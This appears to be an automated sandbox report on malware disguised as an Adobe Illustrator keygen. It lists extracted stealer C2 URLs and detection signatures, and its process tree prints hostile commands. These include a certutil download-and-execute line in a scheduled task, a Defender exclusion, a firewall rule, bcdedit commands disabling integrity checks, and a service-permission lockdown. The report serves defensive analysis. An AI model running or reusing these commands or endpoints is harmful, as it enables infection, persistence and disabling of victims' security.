Analysis

  • max time kernel
    72s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    09-03-2021 14:25

General

  • Target

    adobe_illustrator_keygen_by_KeygenNinja.exe

  • Size

    8.2MB

  • MD5

    9d138fc7214e3406cfc203e4922ab3ac

  • SHA1

    3ec42683d6cd31870a54991386d2ca596f9cdeff

  • SHA256

    ec624715737071e22af8152d2170cb7a04217b3815a00302ff6f534994a7a97b

  • SHA512

    06414e7259ef270ebb668fcb628ee25e3cb265b64b5baba8fc842c45b8e31cb88cea4934b420cb27e7849ee87e62172b44416fff46ab43b5cd4be24dd6048f8b

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

51c194bfb6e404af0e5ff0b93b443907a6a845b1

Attributes
  • url4cnc

    https://telete.in/h_focus_1

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 15 IoCs
  • Nirsoft 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 52 IoCs
  • Looks for VMWare Tools registry key 2 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 19 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SetWindowsHookEx 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adobe_illustrator_keygen_by_KeygenNinja.exe
    "C:\Users\Admin\AppData\Local\Temp\adobe_illustrator_keygen_by_KeygenNinja.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1232
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3936
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2628
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:1460
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:1368
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1548
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:196
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:2776
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3212
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Writes to the Master Boot Record (MBR)
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Modifies system certificate store
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3468
            • C:\Windows\SysWOW64\msiexec.exe
              msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
              5⤵
              • Enumerates connected drives
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:936
            • C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
              C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp1
              5⤵
              • Executes dropped EXE
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of SetThreadContext
              • Checks SCSI registry key(s)
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2084
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:4284
              • C:\Users\Admin\AppData\Roaming\1615300158282.exe
                "C:\Users\Admin\AppData\Roaming\1615300158282.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300158282.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4380
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:4288
              • C:\Users\Admin\AppData\Roaming\1615300163140.exe
                "C:\Users\Admin\AppData\Roaming\1615300163140.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300163140.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2448
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:4516
              • C:\Users\Admin\AppData\Roaming\1615300168374.exe
                "C:\Users\Admin\AppData\Roaming\1615300168374.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300168374.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4104
              • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:5780
              • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                6⤵
                  PID:4688
              • C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
                C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp1
                5⤵
                • Executes dropped EXE
                • Writes to the Master Boot Record (MBR)
                • Checks SCSI registry key(s)
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3884
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  6⤵
                    PID:4272
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      7⤵
                      • Kills process with taskkill
                      PID:4340
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
                    6⤵
                      PID:4508
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 3
                        7⤵
                        • Runs ping.exe
                        PID:4596
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1720
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      6⤵
                      • Runs ping.exe
                      PID:2668
                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                  4⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious use of WriteProcessMemory
                  PID:208
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4168
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      6⤵
                      • Kills process with taskkill
                      PID:4212
                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:4412
                  • C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe
                    "C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                    5⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:4548
                    • C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe
                      "C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe" 1 3.1615299952.6047857028a05 101
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:4300
                      • C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe
                        "C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe" 2 3.1615299952.6047857028a05
                        7⤵
                        • Executes dropped EXE
                        • Checks for any installed AV software in registry
                        • Maps connected drives based on registry
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4620
                        • C:\Users\Admin\AppData\Local\Temp\eyd4o1xdhet\3zghjt3qmqe.exe
                          "C:\Users\Admin\AppData\Local\Temp\eyd4o1xdhet\3zghjt3qmqe.exe" /VERYSILENT
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:4992
                          • C:\Users\Admin\AppData\Local\Temp\is-2T2A8.tmp\3zghjt3qmqe.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-2T2A8.tmp\3zghjt3qmqe.tmp" /SL5="$E0048,870426,780800,C:\Users\Admin\AppData\Local\Temp\eyd4o1xdhet\3zghjt3qmqe.exe" /VERYSILENT
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:5036
                            • C:\Users\Admin\AppData\Local\Temp\is-KHP4U.tmp\winlthst.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-KHP4U.tmp\winlthst.exe" test1 test1
                              10⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:5736
                        • C:\Users\Admin\AppData\Local\Temp\ov5apjvh1a1\vpn.exe
                          "C:\Users\Admin\AppData\Local\Temp\ov5apjvh1a1\vpn.exe" /silent /subid=482
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:1096
                          • C:\Users\Admin\AppData\Local\Temp\is-C7D2A.tmp\vpn.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-C7D2A.tmp\vpn.tmp" /SL5="$2025C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ov5apjvh1a1\vpn.exe" /silent /subid=482
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:4348
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                              10⤵
                                PID:4176
                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                  tapinstall.exe remove tap0901
                                  11⤵
                                    PID:6040
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                  10⤵
                                    PID:6344
                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                      tapinstall.exe install OemVista.inf tap0901
                                      11⤵
                                        PID:6424
                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                      10⤵
                                        PID:4188
                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                        10⤵
                                          PID:5488
                                    • C:\Users\Admin\AppData\Local\Temp\hc1xx1gjznk\so1y2dml4mg.exe
                                      "C:\Users\Admin\AppData\Local\Temp\hc1xx1gjznk\so1y2dml4mg.exe" testparams
                                      8⤵
                                      • Executes dropped EXE
                                      PID:4648
                                      • C:\Users\Admin\AppData\Roaming\zey1h4bwsk5\2oo0xwkdvse.exe
                                        "C:\Users\Admin\AppData\Roaming\zey1h4bwsk5\2oo0xwkdvse.exe" /VERYSILENT /p=testparams
                                        9⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:6084
                                        • C:\Users\Admin\AppData\Local\Temp\is-PI1VM.tmp\2oo0xwkdvse.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-PI1VM.tmp\2oo0xwkdvse.tmp" /SL5="$202FA,552809,216064,C:\Users\Admin\AppData\Roaming\zey1h4bwsk5\2oo0xwkdvse.exe" /VERYSILENT /p=testparams
                                          10⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Adds Run key to start application
                                          • Suspicious use of SetWindowsHookEx
                                          PID:6112
                                    • C:\Users\Admin\AppData\Local\Temp\bg1e0gouxyz\IBInstaller_97039.exe
                                      "C:\Users\Admin\AppData\Local\Temp\bg1e0gouxyz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5084
                                      • C:\Users\Admin\AppData\Local\Temp\is-E6LV1.tmp\IBInstaller_97039.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-E6LV1.tmp\IBInstaller_97039.tmp" /SL5="$102BE,14441882,721408,C:\Users\Admin\AppData\Local\Temp\bg1e0gouxyz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                        9⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Drops file in Program Files directory
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3472
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                          10⤵
                                            PID:4276
                                          • C:\Users\Admin\AppData\Local\Temp\is-308V1.tmp\{app}\chrome_proxy.exe
                                            "C:\Users\Admin\AppData\Local\Temp\is-308V1.tmp\{app}\chrome_proxy.exe"
                                            10⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4484
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-308V1.tmp\{app}\chrome_proxy.exe"
                                              11⤵
                                                PID:4512
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping localhost -n 4
                                                  12⤵
                                                  • Runs ping.exe
                                                  PID:5016
                                        • C:\Users\Admin\AppData\Local\Temp\liz4pgk53d2\dxial0iierr.exe
                                          "C:\Users\Admin\AppData\Local\Temp\liz4pgk53d2\dxial0iierr.exe" 57a764d042bf8
                                          8⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          PID:224
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k "C:\Program Files\06NZJ10HT4\06NZJ10HT.exe" 57a764d042bf8 & exit
                                            9⤵
                                              PID:6044
                                              • C:\Program Files\06NZJ10HT4\06NZJ10HT.exe
                                                "C:\Program Files\06NZJ10HT4\06NZJ10HT.exe" 57a764d042bf8
                                                10⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:6140
                                          • C:\Users\Admin\AppData\Local\Temp\rrxlku00dbb\vict.exe
                                            "C:\Users\Admin\AppData\Local\Temp\rrxlku00dbb\vict.exe" /VERYSILENT /id=535
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4344
                                          • C:\Users\Admin\AppData\Local\Temp\ougnz4kr2zb\chashepro3.exe
                                            "C:\Users\Admin\AppData\Local\Temp\ougnz4kr2zb\chashepro3.exe" /VERYSILENT
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4232
                                          • C:\Users\Admin\AppData\Local\Temp\czthzce305i\chqta5qgtz3.exe
                                            "C:\Users\Admin\AppData\Local\Temp\czthzce305i\chqta5qgtz3.exe" /ustwo INSTALL
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4200
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "chqta5qgtz3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\czthzce305i\chqta5qgtz3.exe" & exit
                                              9⤵
                                                PID:3164
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im "chqta5qgtz3.exe" /f
                                                  10⤵
                                                  • Kills process with taskkill
                                                  PID:5944
                                            • C:\Users\Admin\AppData\Local\Temp\uznogmtigcn\askinstall24.exe
                                              "C:\Users\Admin\AppData\Local\Temp\uznogmtigcn\askinstall24.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4244
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                9⤵
                                                  PID:5460
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    10⤵
                                                    • Kills process with taskkill
                                                    PID:5596
                                              • C:\Users\Admin\AppData\Local\Temp\vbdgs0pl1yt\app.exe
                                                "C:\Users\Admin\AppData\Local\Temp\vbdgs0pl1yt\app.exe" /8-23
                                                8⤵
                                                • Executes dropped EXE
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5800
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wispy-Frog"
                                                  9⤵
                                                    PID:5180
                                                  • C:\Program Files (x86)\Wispy-Frog\7za.exe
                                                    "C:\Program Files (x86)\Wispy-Frog\7za.exe" e -p154.61.71.51 winamp-plugins.7z
                                                    9⤵
                                                      PID:5072
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Wispy-Frog\app.exe" -map "C:\Program Files (x86)\Wispy-Frog\WinmonProcessMonitor.sys""
                                                      9⤵
                                                        PID:6028
                                                        • C:\Program Files (x86)\Wispy-Frog\app.exe
                                                          "C:\Program Files (x86)\Wispy-Frog\app.exe" -map "C:\Program Files (x86)\Wispy-Frog\WinmonProcessMonitor.sys"
                                                          10⤵
                                                            PID:4144
                                                        • C:\Program Files (x86)\Wispy-Frog\7za.exe
                                                          "C:\Program Files (x86)\Wispy-Frog\7za.exe" e -p154.61.71.51 winamp.7z
                                                          9⤵
                                                            PID:6232
                                                          • C:\Program Files (x86)\Wispy-Frog\app.exe
                                                            "C:\Program Files (x86)\Wispy-Frog\app.exe" /8-23
                                                            9⤵
                                                              PID:6524
                                                              • C:\Program Files (x86)\Wispy-Frog\app.exe
                                                                "C:\Program Files (x86)\Wispy-Frog\app.exe" /8-23
                                                                10⤵
                                                                  PID:2924
                                                                  • C:\Windows\System32\cmd.exe
                                                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                    11⤵
                                                                      PID:5548
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                        12⤵
                                                                          PID:5884
                                                                      • C:\Windows\rss\csrss.exe
                                                                        C:\Windows\rss\csrss.exe /8-23
                                                                        11⤵
                                                                          PID:5592
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                            12⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:4660
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                                                            12⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:6128
                                                                          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                                            12⤵
                                                                              PID:5676
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:188
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:4716
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:5268
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:6528
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:6708
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:5420
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:4672
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:5708
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:3300
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:5324
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:6684
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -timeout 0
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:5720
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:6980
                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
                                                                                13⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:5176
                                                                            • C:\Windows\System32\bcdedit.exe
                                                                              C:\Windows\Sysnative\bcdedit.exe /v
                                                                              12⤵
                                                                              • Modifies boot configuration data using bcdedit
                                                                              PID:5772
                                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                                              12⤵
                                                                                PID:4632
                                                                              • C:\Windows\windefender.exe
                                                                                "C:\Windows\windefender.exe"
                                                                                12⤵
                                                                                  PID:6912
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                    13⤵
                                                                                      PID:5400
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                        14⤵
                                                                                          PID:4856
                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
